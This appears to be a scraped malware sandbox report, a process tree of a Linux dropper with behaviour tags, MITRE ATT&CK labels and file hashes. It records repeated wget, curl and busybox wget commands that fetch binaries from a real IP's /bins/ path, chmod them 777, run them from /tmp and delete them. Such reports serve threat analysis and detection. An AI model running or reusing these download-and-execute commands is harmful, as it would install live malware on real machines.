/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:945
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:951
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:957
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:963
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:969
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:975
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:981
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97